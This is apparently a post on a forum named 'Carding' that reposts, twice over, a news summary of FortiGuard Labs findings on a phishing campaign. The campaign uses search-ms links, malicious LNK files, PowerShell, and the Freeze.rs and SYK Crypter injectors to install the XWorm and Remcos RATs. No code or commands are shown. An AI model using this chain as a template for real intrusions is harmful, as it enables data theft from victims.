Carding
Professional
- Messages
- 2,870
- Reaction score
- 2,511
- Points
- 113
The complex attack chain uses the legitimate Freeze.rs tool and leads to the installation of the XWorm and Remcos RAT Trojans.
Cybercriminals have launched a new chain of attacks to deploy "XWorm" and "Remcos RAT" malware using the legitimate Rust injector "Freeze.rs". The malicious operation was uncovered by FortiGuard Labs on July 13, 2023.
The attack starts with a phishing email containing a malicious PDF file. Once launched, this file redirects the victim to an HTML file and uses the “search-ms” protocol to access an LNK file (essentially a regular shortcut with a prescribed launch parameter) on a remote server, experts explained. When a malicious shortcut is launched, a PowerShell script is executed that launches the Freeze.rs and SYK Crypter injectors for further malicious actions.
Released in May of this year, Freeze.rs is a legitimate hacking tool for bypassing security features and silently executing shellcode, available for download on GitHub.
SYK Crypter, in turn, is used to distribute various malware such as AsyncRAT, NanoCore RAT, njRAT, QuasarRAT, RedLine Stealer, and Warzone RAT (also known as Ave Maria). SYK Crypter is loaded via a .NET loader attached to emails that masquerade as harmless purchase orders.
In the final step, the decrypted shellcode executes the XWorm remote access Trojan and collects sensitive data such as computer information, screenshots and keystrokes, and remotely controls the compromised device. In addition, in parallel with XWorm, apparently to expand the malicious capabilities, another remote access trojan, Remcos RAT, is also launched on the victim's computer.
Complete attack chain identified by researchers
It is worth noting that, more recently, Trellix has identified similar infection sequences with HTML and PDF attachments that launch a search process on an attacker-controlled server and then display the malicious files in Windows Explorer as local search results. We talked about this very interesting malicious operation a couple of weeks ago.
The findings of the FortiGuard researchers are similar: the files masquerade as PDFs, but are actually malicious shortcuts that execute a PowerShell script to launch the Rust injector, while showing a dummy PDF document to avert suspicion.
“The combination of XWorm and Remcos RAT creates a formidable threat with a host of malicious features,” the researchers say. "The attacker's C2 server traffic report shows that Europe and North America are the main targets of this malicious campaign."
The fact that the relatively new Freeze.rs hacking tool, released only 3 months ago, is already being used in real attacks symbolizes the quick decision making of attackers who do not want to miss the opportunity to arm themselves with new effective tools to achieve their goals.
Cybercriminals have launched a new chain of attacks to deploy "XWorm" and "Remcos RAT" malware using the legitimate Rust injector "Freeze.rs". The malicious operation was uncovered by FortiGuard Labs on July 13, 2023.
The attack starts with a phishing email containing a malicious PDF file. Once launched, this file redirects the victim to an HTML file and uses the “search-ms” protocol to access an LNK file (essentially a regular shortcut with a prescribed launch parameter) on a remote server, experts explained. When a malicious shortcut is launched, a PowerShell script is executed that launches the Freeze.rs and SYK Crypter injectors for further malicious actions.
Released in May of this year, Freeze.rs is a legitimate hacking tool for bypassing security features and silently executing shellcode, available for download on GitHub.
SYK Crypter, in turn, is used to distribute various malware such as AsyncRAT, NanoCore RAT, njRAT, QuasarRAT, RedLine Stealer, and Warzone RAT (also known as Ave Maria). SYK Crypter is loaded via a .NET loader attached to emails that masquerade as harmless purchase orders.
In the final step, the decrypted shellcode executes the XWorm remote access Trojan and collects sensitive data such as computer information, screenshots and keystrokes, and remotely controls the compromised device. In addition, in parallel with XWorm, apparently to expand the malicious capabilities, another remote access trojan, Remcos RAT, is also launched on the victim's computer.
Complete attack chain identified by researchers
It is worth noting that, more recently, Trellix has identified similar infection sequences with HTML and PDF attachments that launch a search process on an attacker-controlled server and then display the malicious files in Windows Explorer as local search results. We talked about this very interesting malicious operation a couple of weeks ago.
The findings of the FortiGuard researchers are similar: the files masquerade as PDFs, but are actually malicious shortcuts that execute a PowerShell script to launch the Rust injector, while showing a dummy PDF document to avert suspicion.
“The combination of XWorm and Remcos RAT creates a formidable threat with a host of malicious features,” the researchers say. "The attacker's C2 server traffic report shows that Europe and North America are the main targets of this malicious campaign."
The fact that the relatively new Freeze.rs hacking tool, released only 3 months ago, is already being used in real attacks symbolizes the quick decision making of attackers who do not want to miss the opportunity to arm themselves with new effective tools to achieve their goals.
